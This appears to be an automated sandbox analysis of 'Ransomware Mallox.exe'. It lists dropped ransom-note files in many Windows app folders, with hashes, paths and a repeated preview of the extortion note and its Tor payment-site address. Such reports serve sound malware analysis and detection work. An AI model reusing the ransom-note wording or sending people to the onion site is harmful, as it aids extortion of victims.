                    Size (bytes):1410
                    Entropy (8bit):4.764173461001785
                    Encrypted:false
                    SSDEEP:24:a/uY2308Lcq39xe+6L1ruW67nGVcyuZHVnFmFEIs/pPR4mZPnv0AVCQyYFaH6K:a/uY2JJ9bZGyV59jpZTPnv0AVCh
                    MD5:6DDFF72889E32381AFDC270CC8EC3394
                    SHA1:9BA2588C500BBE558A7DFF173EAE2F23576B10DD
                    SHA-256:F8BCDB525719DC59A0AEA71CF563C2674A76D6354BAC320F707327F27BB8DAA2
                    SHA-512:FEFE0EF592802132AAEEC075A257FCC72B5C75F3EF3E2A66CECCF6049666D8EDB0DD27F0215E45DB8788A064CCB660130546EB10AEB748365404C5F920636266
                    Malicious:false
                    Preview:Hello....Your files are encrypted and can not be used..We have downloaded your confidential data and are ready to publish it on our blog..To return your files in work condition you need decryption tool..Follow the instructions to decrypt all your data....Do not try to change or restore files yourself, this will break them..If you want, on our site you can decrypt one file for free. Free test decryption allowed only for not valuable file with size less than 3MB....How to get decryption tool:..1) Download and install TOR browser by this link: https://www.torproject.org/download/..2) If TOR blocked in your country and you can't access to the link then use any VPN software..3) Run TOR browser and open the site: wtyafjyhwqrgo4a45wdvvwhen3cx4euie73qvlhkhvlrexljoyuklaad.onion/mallox/privateSignin..4) Copy your private ID in the input field. Your Private key: 9012E04F2C4927607FA56A90..5) You will see payment information and we can make free test decryption here..6)After payment, you will recei

                    C:\Users\user\AppData\Local\Packages\Microsoft.Windows.PeopleExperienceHost_cw5n1h2txyewy\AC\HOW TO BACK FILES.txt

                    Download File
                    Process:C:\Users\user\Desktop\Ransomware Mallox.exe
                    File Type:data
                    Category:dropped
                    Size (bytes):1410
                    Entropy (8bit):4.764173461001785
                    Encrypted:false
                    SSDEEP:24:a/uY2308Lcq39xe+6L1ruW67nGVcyuZHVnFmFEIs/pPR4mZPnv0AVCQyYFaH6K:a/uY2JJ9bZGyV59jpZTPnv0AVCh
                    MD5:6DDFF72889E32381AFDC270CC8EC3394
                    SHA1:9BA2588C500BBE558A7DFF173EAE2F23576B10DD
                    SHA-256:F8BCDB525719DC59A0AEA71CF563C2674A76D6354BAC320F707327F27BB8DAA2
                    SHA-512:FEFE0EF592802132AAEEC075A257FCC72B5C75F3EF3E2A66CECCF6049666D8EDB0DD27F0215E45DB8788A064CCB660130546EB10AEB748365404C5F920636266
                    Malicious:false
                    Preview:Hello....Your files are encrypted and can not be used..We have downloaded your confidential data and are ready to publish it on our blog..To return your files in work condition you need decryption tool..Follow the instructions to decrypt all your data....Do not try to change or restore files yourself, this will break them..If you want, on our site you can decrypt one file for free. Free test decryption allowed only for not valuable file with size less than 3MB....How to get decryption tool:..1) Download and install TOR browser by this link: https://www.torproject.org/download/..2) If TOR blocked in your country and you can't access to the link then use any VPN software..3) Run TOR browser and open the site: wtyafjyhwqrgo4a45wdvvwhen3cx4euie73qvlhkhvlrexljoyuklaad.onion/mallox/privateSignin..4) Copy your private ID in the input field. Your Private key: 9012E04F2C4927607FA56A90..5) You will see payment information and we can make free test decryption here..6)After payment, you will recei

                    C:\Users\user\AppData\Local\Packages\Microsoft.Windows.PeopleExperienceHost_cw5n1h2txyewy\AC\INetCache\HOW TO BACK FILES.txt

                    Download File
                    Process:C:\Users\user\Desktop\Ransomware Mallox.exe
                    File Type:data
                    Category:dropped
                    Size (bytes):1410
                    Entropy (8bit):4.764173461001785
                    Encrypted:false
                    SSDEEP:24:a/uY2308Lcq39xe+6L1ruW67nGVcyuZHVnFmFEIs/pPR4mZPnv0AVCQyYFaH6K:a/uY2JJ9bZGyV59jpZTPnv0AVCh
                    MD5:6DDFF72889E32381AFDC270CC8EC3394
                    SHA1:9BA2588C500BBE558A7DFF173EAE2F23576B10DD
                    SHA-256:F8BCDB525719DC59A0AEA71CF563C2674A76D6354BAC320F707327F27BB8DAA2
                    SHA-512:FEFE0EF592802132AAEEC075A257FCC72B5C75F3EF3E2A66CECCF6049666D8EDB0DD27F0215E45DB8788A064CCB660130546EB10AEB748365404C5F920636266
                    Malicious:false
                    Preview:Hello....Your files are encrypted and can not be used..We have downloaded your confidential data and are ready to publish it on our blog..To return your files in work condition you need decryption tool..Follow the instructions to decrypt all your data....Do not try to change or restore files yourself, this will break them..If you want, on our site you can decrypt one file for free. Free test decryption allowed only for not valuable file with size less than 3MB....How to get decryption tool:..1) Download and install TOR browser by this link: https://www.torproject.org/download/..2) If TOR blocked in your country and you can't access to the link then use any VPN software..3) Run TOR browser and open the site: wtyafjyhwqrgo4a45wdvvwhen3cx4euie73qvlhkhvlrexljoyuklaad.onion/mallox/privateSignin..4) Copy your private ID in the input field. Your Private key: 9012E04F2C4927607FA56A90..5) You will see payment information and we can make free test decryption here..6)After payment, you will recei

                    C:\Users\user\AppData\Local\Packages\Microsoft.Windows.PeopleExperienceHost_cw5n1h2txyewy\AC\INetCookies\HOW TO BACK FILES.txt

                    Download File
                    Process:C:\Users\user\Desktop\Ransomware Mallox.exe
                    File Type:data
                    Category:dropped
                    Size (bytes):1410
                    Entropy (8bit):4.764173461001785
                    Encrypted:false
                    SSDEEP:24:a/uY2308Lcq39xe+6L1ruW67nGVcyuZHVnFmFEIs/pPR4mZPnv0AVCQyYFaH6K:a/uY2JJ9bZGyV59jpZTPnv0AVCh
                    MD5:6DDFF72889E32381AFDC270CC8EC3394
                    SHA1:9BA2588C500BBE558A7DFF173EAE2F23576B10DD
                    SHA-256:F8BCDB525719DC59A0AEA71CF563C2674A76D6354BAC320F707327F27BB8DAA2
                    SHA-512:FEFE0EF592802132AAEEC075A257FCC72B5C75F3EF3E2A66CECCF6049666D8EDB0DD27F0215E45DB8788A064CCB660130546EB10AEB748365404C5F920636266
                    Malicious:false
                    Preview:Hello....Your files are encrypted and can not be used..We have downloaded your confidential data and are ready to publish it on our blog..To return your files in work condition you need decryption tool..Follow the instructions to decrypt all your data....Do not try to change or restore files yourself, this will break them..If you want, on our site you can decrypt one file for free. Free test decryption allowed only for not valuable file with size less than 3MB....How to get decryption tool:..1) Download and install TOR browser by this link: https://www.torproject.org/download/..2) If TOR blocked in your country and you can't access to the link then use any VPN software..3) Run TOR browser and open the site: wtyafjyhwqrgo4a45wdvvwhen3cx4euie73qvlhkhvlrexljoyuklaad.onion/mallox/privateSignin..4) Copy your private ID in the input field. Your Private key: 9012E04F2C4927607FA56A90..5) You will see payment information and we can make free test decryption here..6)After payment, you will recei

                    C:\Users\user\AppData\Local\Packages\Microsoft.Windows.PeopleExperienceHost_cw5n1h2txyewy\AC\INetHistory\HOW TO BACK FILES.txt

                    Download File
                    Process:C:\Users\user\Desktop\Ransomware Mallox.exe
                    File Type:data
                    Category:dropped
                    Size (bytes):1410
                    Entropy (8bit):4.764173461001785
                    Encrypted:false
                    SSDEEP:24:a/uY2308Lcq39xe+6L1ruW67nGVcyuZHVnFmFEIs/pPR4mZPnv0AVCQyYFaH6K:a/uY2JJ9bZGyV59jpZTPnv0AVCh
                    MD5:6DDFF72889E32381AFDC270CC8EC3394
                    SHA1:9BA2588C500BBE558A7DFF173EAE2F23576B10DD
                    SHA-256:F8BCDB525719DC59A0AEA71CF563C2674A76D6354BAC320F707327F27BB8DAA2
                    SHA-512:FEFE0EF592802132AAEEC075A257FCC72B5C75F3EF3E2A66CECCF6049666D8EDB0DD27F0215E45DB8788A064CCB660130546EB10AEB748365404C5F920636266
                    Malicious:false
                    Preview:Hello....Your files are encrypted and can not be used..We have downloaded your confidential data and are ready to publish it on our blog..To return your files in work condition you need decryption tool..Follow the instructions to decrypt all your data....Do not try to change or restore files yourself, this will break them..If you want, on our site you can decrypt one file for free. Free test decryption allowed only for not valuable file with size less than 3MB....How to get decryption tool:..1) Download and install TOR browser by this link: https://www.torproject.org/download/..2) If TOR blocked in your country and you can't access to the link then use any VPN software..3) Run TOR browser and open the site: wtyafjyhwqrgo4a45wdvvwhen3cx4euie73qvlhkhvlrexljoyuklaad.onion/mallox/privateSignin..4) Copy your private ID in the input field. Your Private key: 9012E04F2C4927607FA56A90..5) You will see payment information and we can make free test decryption here..6)After payment, you will recei

                    C:\Users\user\AppData\Local\Packages\Microsoft.Windows.PeopleExperienceHost_cw5n1h2txyewy\AC\Temp\HOW TO BACK FILES.txt

                    Download File
                    Process:C:\Users\user\Desktop\Ransomware Mallox.exe
                    File Type:data
                    Category:dropped
                    Size (bytes):1410
                    Entropy (8bit):4.764173461001785
                    Encrypted:false
                    SSDEEP:24:a/uY2308Lcq39xe+6L1ruW67nGVcyuZHVnFmFEIs/pPR4mZPnv0AVCQyYFaH6K:a/uY2JJ9bZGyV59jpZTPnv0AVCh
                    MD5:6DDFF72889E32381AFDC270CC8EC3394
                    SHA1:9BA2588C500BBE558A7DFF173EAE2F23576B10DD
                    SHA-256:F8BCDB525719DC59A0AEA71CF563C2674A76D6354BAC320F707327F27BB8DAA2
                    SHA-512:FEFE0EF592802132AAEEC075A257FCC72B5C75F3EF3E2A66CECCF6049666D8EDB0DD27F0215E45DB8788A064CCB660130546EB10AEB748365404C5F920636266
                    Malicious:false
                    Preview:Hello....Your files are encrypted and can not be used..We have downloaded your confidential data and are ready to publish it on our blog..To return your files in work condition you need decryption tool..Follow the instructions to decrypt all your data....Do not try to change or restore files yourself, this will break them..If you want, on our site you can decrypt one file for free. Free test decryption allowed only for not valuable file with size less than 3MB....How to get decryption tool:..1) Download and install TOR browser by this link: https://www.torproject.org/download/..2) If TOR blocked in your country and you can't access to the link then use any VPN software..3) Run TOR browser and open the site: wtyafjyhwqrgo4a45wdvvwhen3cx4euie73qvlhkhvlrexljoyuklaad.onion/mallox/privateSignin..4) Copy your private ID in the input field. Your Private key: 9012E04F2C4927607FA56A90..5) You will see payment information and we can make free test decryption here..6)After payment, you will recei

                    C:\Users\user\AppData\Local\Packages\Microsoft.Windows.PeopleExperienceHost_cw5n1h2txyewy\HOW TO BACK FILES.txt

                    Download File
                    Process:C:\Users\user\Desktop\Ransomware Mallox.exe
                    File Type:data
                    Category:dropped
                    Size (bytes):1410
                    Entropy (8bit):4.764173461001785
                    Encrypted:false
                    SSDEEP:24:a/uY2308Lcq39xe+6L1ruW67nGVcyuZHVnFmFEIs/pPR4mZPnv0AVCQyYFaH6K:a/uY2JJ9bZGyV59jpZTPnv0AVCh
                    MD5:6DDFF72889E32381AFDC270CC8EC3394
                    SHA1:9BA2588C500BBE558A7DFF173EAE2F23576B10DD
                    SHA-256:F8BCDB525719DC59A0AEA71CF563C2674A76D6354BAC320F707327F27BB8DAA2
                    SHA-512:FEFE0EF592802132AAEEC075A257FCC72B5C75F3EF3E2A66CECCF6049666D8EDB0DD27F0215E45DB8788A064CCB660130546EB10AEB748365404C5F920636266
                    Malicious:false
                    Preview:Hello....Your files are encrypted and can not be used..We have downloaded your confidential data and are ready to publish it on our blog..To return your files in work condition you need decryption tool..Follow the instructions to decrypt all your data....Do not try to change or restore files yourself, this will break them..If you want, on our site you can decrypt one file for free. Free test decryption allowed only for not valuable file with size less than 3MB....How to get decryption tool:..1) Download and install TOR browser by this link: https://www.torproject.org/download/..2) If TOR blocked in your country and you can't access to the link then use any VPN software..3) Run TOR browser and open the site: wtyafjyhwqrgo4a45wdvvwhen3cx4euie73qvlhkhvlrexljoyuklaad.onion/mallox/privateSignin..4) Copy your private ID in the input field. Your Private key: 9012E04F2C4927607FA56A90..5) You will see payment information and we can make free test decryption here..6)After payment, you will recei

                    C:\Users\user\AppData\Local\Packages\Microsoft.Windows.PeopleExperienceHost_cw5n1h2txyewy\LocalCache\HOW TO BACK FILES.txt

                    Download File
                    Process:C:\Users\user\Desktop\Ransomware Mallox.exe
                    File Type:data
                    Category:dropped
                    Size (bytes):1410
                    Entropy (8bit):4.764173461001785
                    Encrypted:false
                    SSDEEP:24:a/uY2308Lcq39xe+6L1ruW67nGVcyuZHVnFmFEIs/pPR4mZPnv0AVCQyYFaH6K:a/uY2JJ9bZGyV59jpZTPnv0AVCh
                    MD5:6DDFF72889E32381AFDC270CC8EC3394
                    SHA1:9BA2588C500BBE558A7DFF173EAE2F23576B10DD
                    SHA-256:F8BCDB525719DC59A0AEA71CF563C2674A76D6354BAC320F707327F27BB8DAA2
                    SHA-512:FEFE0EF592802132AAEEC075A257FCC72B5C75F3EF3E2A66CECCF6049666D8EDB0DD27F0215E45DB8788A064CCB660130546EB10AEB748365404C5F920636266
                    Malicious:false
                    Preview:Hello....Your files are encrypted and can not be used..We have downloaded your confidential data and are ready to publish it on our blog..To return your files in work condition you need decryption tool..Follow the instructions to decrypt all your data....Do not try to change or restore files yourself, this will break them..If you want, on our site you can decrypt one file for free. Free test decryption allowed only for not valuable file with size less than 3MB....How to get decryption tool:..1) Download and install TOR browser by this link: https://www.torproject.org/download/..2) If TOR blocked in your country and you can't access to the link then use any VPN software..3) Run TOR browser and open the site: wtyafjyhwqrgo4a45wdvvwhen3cx4euie73qvlhkhvlrexljoyuklaad.onion/mallox/privateSignin..4) Copy your private ID in the input field. Your Private key: 9012E04F2C4927607FA56A90..5) You will see payment information and we can make free test decryption here..6)After payment, you will recei

                    C:\Users\user\AppData\Local\Packages\Microsoft.Windows.PeopleExperienceHost_cw5n1h2txyewy\LocalState\HOW TO BACK FILES.txt

                    Download File
                    Process:C:\Users\user\Desktop\Ransomware Mallox.exe
                    File Type:data
                    Category:dropped
                    Size (bytes):1410
                    Entropy (8bit):4.764173461001785
                    Encrypted:false
                    SSDEEP:24:a/uY2308Lcq39xe+6L1ruW67nGVcyuZHVnFmFEIs/pPR4mZPnv0AVCQyYFaH6K:a/uY2JJ9bZGyV59jpZTPnv0AVCh
                    MD5:6DDFF72889E32381AFDC270CC8EC3394
                    SHA1:9BA2588C500BBE558A7DFF173EAE2F23576B10DD
                    SHA-256:F8BCDB525719DC59A0AEA71CF563C2674A76D6354BAC320F707327F27BB8DAA2
                    SHA-512:FEFE0EF592802132AAEEC075A257FCC72B5C75F3EF3E2A66CECCF6049666D8EDB0DD27F0215E45DB8788A064CCB660130546EB10AEB748365404C5F920636266
                    Malicious:false
                    Preview:Hello....Your files are encrypted and can not be used..We have downloaded your confidential data and are ready to publish it on our blog..To return your files in work condition you need decryption tool..Follow the instructions to decrypt all your data....Do not try to change or restore files yourself, this will break them..If you want, on our site you can decrypt one file for free. Free test decryption allowed only for not valuable file with size less than 3MB....How to get decryption tool:..1) Download and install TOR browser by this link: https://www.torproject.org/download/..2) If TOR blocked in your country and you can't access to the link then use any VPN software..3) Run TOR browser and open the site: wtyafjyhwqrgo4a45wdvvwhen3cx4euie73qvlhkhvlrexljoyuklaad.onion/mallox/privateSignin..4) Copy your private ID in the input field. Your Private key: 9012E04F2C4927607FA56A90..5) You will see payment information and we can make free test decryption here..6)After payment, you will recei

                    C:\Users\user\AppData\Local\Packages\Microsoft.Windows.PeopleExperienceHost_cw5n1h2txyewy\RoamingState\HOW TO BACK FILES.txt

                    Download File
                    Process:C:\Users\user\Desktop\Ransomware Mallox.exe
                    File Type:data
                    Category:dropped
                    Size (bytes):1410
                    Entropy (8bit):4.764173461001785
                    Encrypted:false
                    SSDEEP:24:a/uY2308Lcq39xe+6L1ruW67nGVcyuZHVnFmFEIs/pPR4mZPnv0AVCQyYFaH6K:a/uY2JJ9bZGyV59jpZTPnv0AVCh
                    MD5:6DDFF72889E32381AFDC270CC8EC3394
                    SHA1:9BA2588C500BBE558A7DFF173EAE2F23576B10DD
                    SHA-256:F8BCDB525719DC59A0AEA71CF563C2674A76D6354BAC320F707327F27BB8DAA2
                    SHA-512:FEFE0EF592802132AAEEC075A257FCC72B5C75F3EF3E2A66CECCF6049666D8EDB0DD27F0215E45DB8788A064CCB660130546EB10AEB748365404C5F920636266
                    Malicious:false
                    Preview:Hello....Your files are encrypted and can not be used..We have downloaded your confidential data and are ready to publish it on our blog..To return your files in work condition you need decryption tool..Follow the instructions to decrypt all your data....Do not try to change or restore files yourself, this will break them..If you want, on our site you can decrypt one file for free. Free test decryption allowed only for not valuable file with size less than 3MB....How to get decryption tool:..1) Download and install TOR browser by this link: https://www.torproject.org/download/..2) If TOR blocked in your country and you can't access to the link then use any VPN software..3) Run TOR browser and open the site: wtyafjyhwqrgo4a45wdvvwhen3cx4euie73qvlhkhvlrexljoyuklaad.onion/mallox/privateSignin..4) Copy your private ID in the input field. Your Private key: 9012E04F2C4927607FA56A90..5) You will see payment information and we can make free test decryption here..6)After payment, you will recei

                    C:\Users\user\AppData\Local\Packages\Microsoft.Windows.PeopleExperienceHost_cw5n1h2txyewy\Settings\HOW TO BACK FILES.txt

                    Download File
                    Process:C:\Users\user\Desktop\Ransomware Mallox.exe
                    File Type:data
                    Category:dropped
                    Size (bytes):1410
                    Entropy (8bit):4.764173461001785
                    Encrypted:false
                    SSDEEP:24:a/uY2308Lcq39xe+6L1ruW67nGVcyuZHVnFmFEIs/pPR4mZPnv0AVCQyYFaH6K:a/uY2JJ9bZGyV59jpZTPnv0AVCh
                    MD5:6DDFF72889E32381AFDC270CC8EC3394
                    SHA1:9BA2588C500BBE558A7DFF173EAE2F23576B10DD
                    SHA-256:F8BCDB525719DC59A0AEA71CF563C2674A76D6354BAC320F707327F27BB8DAA2
                    SHA-512:FEFE0EF592802132AAEEC075A257FCC72B5C75F3EF3E2A66CECCF6049666D8EDB0DD27F0215E45DB8788A064CCB660130546EB10AEB748365404C5F920636266
                    Malicious:false
                    Preview:Hello....Your files are encrypted and can not be used..We have downloaded your confidential data and are ready to publish it on our blog..To return your files in work condition you need decryption tool..Follow the instructions to decrypt all your data....Do not try to change or restore files yourself, this will break them..If you want, on our site you can decrypt one file for free. Free test decryption allowed only for not valuable file with size less than 3MB....How to get decryption tool:..1) Download and install TOR browser by this link: https://www.torproject.org/download/..2) If TOR blocked in your country and you can't access to the link then use any VPN software..3) Run TOR browser and open the site: wtyafjyhwqrgo4a45wdvvwhen3cx4euie73qvlhkhvlrexljoyuklaad.onion/mallox/privateSignin..4) Copy your private ID in the input field. Your Private key: 9012E04F2C4927607FA56A90..5) You will see payment information and we can make free test decryption here..6)After payment, you will recei

                    C:\Users\user\AppData\Local\Packages\Microsoft.Windows.PeopleExperienceHost_cw5n1h2txyewy\SystemAppData\HOW TO BACK FILES.txt

                    Download File
                    Process:C:\Users\user\Desktop\Ransomware Mallox.exe
                    File Type:data
                    Category:dropped
                    Size (bytes):1410
                    Entropy (8bit):4.764173461001785
                    Encrypted:false
                    SSDEEP:24:a/uY2308Lcq39xe+6L1ruW67nGVcyuZHVnFmFEIs/pPR4mZPnv0AVCQyYFaH6K:a/uY2JJ9bZGyV59jpZTPnv0AVCh
                    MD5:6DDFF72889E32381AFDC270CC8EC3394
                    SHA1:9BA2588C500BBE558A7DFF173EAE2F23576B10DD
                    SHA-256:F8BCDB525719DC59A0AEA71CF563C2674A76D6354BAC320F707327F27BB8DAA2
                    SHA-512:FEFE0EF592802132AAEEC075A257FCC72B5C75F3EF3E2A66CECCF6049666D8EDB0DD27F0215E45DB8788A064CCB660130546EB10AEB748365404C5F920636266
                    Malicious:false
                    Preview:Hello....Your files are encrypted and can not be used..We have downloaded your confidential data and are ready to publish it on our blog..To return your files in work condition you need decryption tool..Follow the instructions to decrypt all your data....Do not try to change or restore files yourself, this will break them..If you want, on our site you can decrypt one file for free. Free test decryption allowed only for not valuable file with size less than 3MB....How to get decryption tool:..1) Download and install TOR browser by this link: https://www.torproject.org/download/..2) If TOR blocked in your country and you can't access to the link then use any VPN software..3) Run TOR browser and open the site: wtyafjyhwqrgo4a45wdvvwhen3cx4euie73qvlhkhvlrexljoyuklaad.onion/mallox/privateSignin..4) Copy your private ID in the input field. Your Private key: 9012E04F2C4927607FA56A90..5) You will see payment information and we can make free test decryption here..6)After payment, you will recei

                    C:\Users\user\AppData\Local\Packages\Microsoft.Windows.PeopleExperienceHost_cw5n1h2txyewy\TempState\HOW TO BACK FILES.txt

                    Download File
                    Process:C:\Users\user\Desktop\Ransomware Mallox.exe
                    File Type:data
                    Category:dropped
                    Size (bytes):1410
                    Entropy (8bit):4.764173461001785
                    Encrypted:false
                    SSDEEP:24:a/uY2308Lcq39xe+6L1ruW67nGVcyuZHVnFmFEIs/pPR4mZPnv0AVCQyYFaH6K:a/uY2JJ9bZGyV59jpZTPnv0AVCh
                    MD5:6DDFF72889E32381AFDC270CC8EC3394
                    SHA1:9BA2588C500BBE558A7DFF173EAE2F23576B10DD
                    SHA-256:F8BCDB525719DC59A0AEA71CF563C2674A76D6354BAC320F707327F27BB8DAA2
                    SHA-512:FEFE0EF592802132AAEEC075A257FCC72B5C75F3EF3E2A66CECCF6049666D8EDB0DD27F0215E45DB8788A064CCB660130546EB10AEB748365404C5F920636266
                    Malicious:false
                    Preview:Hello....Your files are encrypted and can not be used..We have downloaded your confidential data and are ready to publish it on our blog..To return your files in work condition you need decryption tool..Follow the instructions to decrypt all your data....Do not try to change or restore files yourself, this will break them..If you want, on our site you can decrypt one file for free. Free test decryption allowed only for not valuable file with size less than 3MB....How to get decryption tool:..1) Download and install TOR browser by this link: https://www.torproject.org/download/..2) If TOR blocked in your country and you can't access to the link then use any VPN software..3) Run TOR browser and open the site: wtyafjyhwqrgo4a45wdvvwhen3cx4euie73qvlhkhvlrexljoyuklaad.onion/mallox/privateSignin..4) Copy your private ID in the input field. Your Private key: 9012E04F2C4927607FA56A90..5) You will see payment information and we can make free test decryption here..6)After payment, you will recei

                    C:\Users\user\AppData\Local\Packages\Microsoft.Windows.Photos_8wekyb3d8bbwe\AC\HOW TO BACK FILES.txt

                    Download File
                    Process:C:\Users\user\Desktop\Ransomware Mallox.exe
                    File Type:data
                    Category:dropped
                    Size (bytes):1410
                    Entropy (8bit):4.764173461001785
                    Encrypted:false
                    SSDEEP:24:a/uY2308Lcq39xe+6L1ruW67nGVcyuZHVnFmFEIs/pPR4mZPnv0AVCQyYFaH6K:a/uY2JJ9bZGyV59jpZTPnv0AVCh
                    MD5:6DDFF72889E32381AFDC270CC8EC3394
                    SHA1:9BA2588C500BBE558A7DFF173EAE2F23576B10DD
                    SHA-256:F8BCDB525719DC59A0AEA71CF563C2674A76D6354BAC320F707327F27BB8DAA2
                    SHA-512:FEFE0EF592802132AAEEC075A257FCC72B5C75F3EF3E2A66CECCF6049666D8EDB0DD27F0215E45DB8788A064CCB660130546EB10AEB748365404C5F920636266
                    Malicious:false
                    Preview:Hello....Your files are encrypted and can not be used..We have downloaded your confidential data and are ready to publish it on our blog..To return your files in work condition you need decryption tool..Follow the instructions to decrypt all your data....Do not try to change or restore files yourself, this will break them..If you want, on our site you can decrypt one file for free. Free test decryption allowed only for not valuable file with size less than 3MB....How to get decryption tool:..1) Download and install TOR browser by this link: https://www.torproject.org/download/..2) If TOR blocked in your country and you can't access to the link then use any VPN software..3) Run TOR browser and open the site: wtyafjyhwqrgo4a45wdvvwhen3cx4euie73qvlhkhvlrexljoyuklaad.onion/mallox/privateSignin..4) Copy your private ID in the input field. Your Private key: 9012E04F2C4927607FA56A90..5) You will see payment information and we can make free test decryption here..6)After payment, you will recei

                    C:\Users\user\AppData\Local\Packages\Microsoft.Windows.Photos_8wekyb3d8bbwe\AC\INetCache\HOW TO BACK FILES.txt

                    Download File
                    Process:C:\Users\user\Desktop\Ransomware Mallox.exe
                    File Type:data
                    Category:dropped
                    Size (bytes):1410
                    Entropy (8bit):4.764173461001785
                    Encrypted:false
                    SSDEEP:24:a/uY2308Lcq39xe+6L1ruW67nGVcyuZHVnFmFEIs/pPR4mZPnv0AVCQyYFaH6K:a/uY2JJ9bZGyV59jpZTPnv0AVCh
                    MD5:6DDFF72889E32381AFDC270CC8EC3394
                    SHA1:9BA2588C500BBE558A7DFF173EAE2F23576B10DD
                    SHA-256:F8BCDB525719DC59A0AEA71CF563C2674A76D6354BAC320F707327F27BB8DAA2
                    SHA-512:FEFE0EF592802132AAEEC075A257FCC72B5C75F3EF3E2A66CECCF6049666D8EDB0DD27F0215E45DB8788A064CCB660130546EB10AEB748365404C5F920636266
                    Malicious:false
                    Preview:Hello....Your files are encrypted and can not be used..We have downloaded your confidential data and are ready to publish it on our blog..To return your files in work condition you need decryption tool..Follow the instructions to decrypt all your data....Do not try to change or restore files yourself, this will break them..If you want, on our site you can decrypt one file for free. Free test decryption allowed only for not valuable file with size less than 3MB....How to get decryption tool:..1) Download and install TOR browser by this link: https://www.torproject.org/download/..2) If TOR blocked in your country and you can't access to the link then use any VPN software..3) Run TOR browser and open the site: wtyafjyhwqrgo4a45wdvvwhen3cx4euie73qvlhkhvlrexljoyuklaad.onion/mallox/privateSignin..4) Copy your private ID in the input field. Your Private key: 9012E04F2C4927607FA56A90..5) You will see payment information and we can make free test decryption here..6)After payment, you will recei

                    C:\Users\user\AppData\Local\Packages\Microsoft.Windows.Photos_8wekyb3d8bbwe\AC\INetCookies\HOW TO BACK FILES.txt

                    Download File
                    Process:C:\Users\user\Desktop\Ransomware Mallox.exe
                    File Type:data
                    Category:dropped
                    Size (bytes):1410
                    Entropy (8bit):4.764173461001785
                    Encrypted:false
                    SSDEEP:24:a/uY2308Lcq39xe+6L1ruW67nGVcyuZHVnFmFEIs/pPR4mZPnv0AVCQyYFaH6K:a/uY2JJ9bZGyV59jpZTPnv0AVCh
                    MD5:6DDFF72889E32381AFDC270CC8EC3394
                    SHA1:9BA2588C500BBE558A7DFF173EAE2F23576B10DD
                    SHA-256:F8BCDB525719DC59A0AEA71CF563C2674A76D6354BAC320F707327F27BB8DAA2
                    SHA-512:FEFE0EF592802132AAEEC075A257FCC72B5C75F3EF3E2A66CECCF6049666D8EDB0DD27F0215E45DB8788A064CCB660130546EB10AEB748365404C5F920636266
                    Malicious:false
                    Preview:Hello....Your files are encrypted and can not be used..We have downloaded your confidential data and are ready to publish it on our blog..To return your files in work condition you need decryption tool..Follow the instructions to decrypt all your data....Do not try to change or restore files yourself, this will break them..If you want, on our site you can decrypt one file for free. Free test decryption allowed only for not valuable file with size less than 3MB....How to get decryption tool:..1) Download and install TOR browser by this link: https://www.torproject.org/download/..2) If TOR blocked in your country and you can't access to the link then use any VPN software..3) Run TOR browser and open the site: wtyafjyhwqrgo4a45wdvvwhen3cx4euie73qvlhkhvlrexljoyuklaad.onion/mallox/privateSignin..4) Copy your private ID in the input field. Your Private key: 9012E04F2C4927607FA56A90..5) You will see payment information and we can make free test decryption here..6)After payment, you will recei

                    C:\Users\user\AppData\Local\Packages\Microsoft.Windows.Photos_8wekyb3d8bbwe\AC\INetHistory\HOW TO BACK FILES.txt

                    Download File
                    Process:C:\Users\user\Desktop\Ransomware Mallox.exe
                    File Type:data
                    Category:dropped
                    Size (bytes):1410
                    Entropy (8bit):4.764173461001785
                    Encrypted:false
                    SSDEEP:24:a/uY2308Lcq39xe+6L1ruW67nGVcyuZHVnFmFEIs/pPR4mZPnv0AVCQyYFaH6K:a/uY2JJ9bZGyV59jpZTPnv0AVCh
                    MD5:6DDFF72889E32381AFDC270CC8EC3394
                    SHA1:9BA2588C500BBE558A7DFF173EAE2F23576B10DD
                    SHA-256:F8BCDB525719DC59A0AEA71CF563C2674A76D6354BAC320F707327F27BB8DAA2
                    SHA-512:FEFE0EF592802132AAEEC075A257FCC72B5C75F3EF3E2A66CECCF6049666D8EDB0DD27F0215E45DB8788A064CCB660130546EB10AEB748365404C5F920636266
                    Malicious:false
                    Preview:Hello....Your files are encrypted and can not be used..We have downloaded your confidential data and are ready to publish it on our blog..To return your files in work condition you need decryption tool..Follow the instructions to decrypt all your data....Do not try to change or restore files yourself, this will break them..If you want, on our site you can decrypt one file for free. Free test decryption allowed only for not valuable file with size less than 3MB....How to get decryption tool:..1) Download and install TOR browser by this link: https://www.torproject.org/download/..2) If TOR blocked in your country and you can't access to the link then use any VPN software..3) Run TOR browser and open the site: wtyafjyhwqrgo4a45wdvvwhen3cx4euie73qvlhkhvlrexljoyuklaad.onion/mallox/privateSignin..4) Copy your private ID in the input field. Your Private key: 9012E04F2C4927607FA56A90..5) You will see payment information and we can make free test decryption here..6)After payment, you will recei

                    C:\Users\user\AppData\Local\Packages\Microsoft.Windows.Photos_8wekyb3d8bbwe\AC\Temp\HOW TO BACK FILES.txt

                    Download File
                    Process:C:\Users\user\Desktop\Ransomware Mallox.exe
                    File Type:data
                    Category:dropped
                    Size (bytes):1410
                    Entropy (8bit):4.764173461001785
                    Encrypted:false
                    SSDEEP:24:a/uY2308Lcq39xe+6L1ruW67nGVcyuZHVnFmFEIs/pPR4mZPnv0AVCQyYFaH6K:a/uY2JJ9bZGyV59jpZTPnv0AVCh
                    MD5:6DDFF72889E32381AFDC270CC8EC3394
                    SHA1:9BA2588C500BBE558A7DFF173EAE2F23576B10DD
                    SHA-256:F8BCDB525719DC59A0AEA71CF563C2674A76D6354BAC320F707327F27BB8DAA2
                    SHA-512:FEFE0EF592802132AAEEC075A257FCC72B5C75F3EF3E2A66CECCF6049666D8EDB0DD27F0215E45DB8788A064CCB660130546EB10AEB748365404C5F920636266
                    Malicious:false
                    Preview:Hello....Your files are encrypted and can not be used..We have downloaded your confidential data and are ready to publish it on our blog..To return your files in work condition you need decryption tool..Follow the instructions to decrypt all your data....Do not try to change or restore files yourself, this will break them..If you want, on our site you can decrypt one file for free. Free test decryption allowed only for not valuable file with size less than 3MB....How to get decryption tool:..1) Download and install TOR browser by this link: https://www.torproject.org/download/..2) If TOR blocked in your country and you can't access to the link then use any VPN software..3) Run TOR browser and open the site: wtyafjyhwqrgo4a45wdvvwhen3cx4euie73qvlhkhvlrexljoyuklaad.onion/mallox/privateSignin..4) Copy your private ID in the input field. Your Private key: 9012E04F2C4927607FA56A90..5) You will see payment information and we can make free test decryption here..6)After payment, you will recei

                    C:\Users\user\AppData\Local\Packages\Microsoft.Windows.Photos_8wekyb3d8bbwe\HOW TO BACK FILES.txt

                    Download File
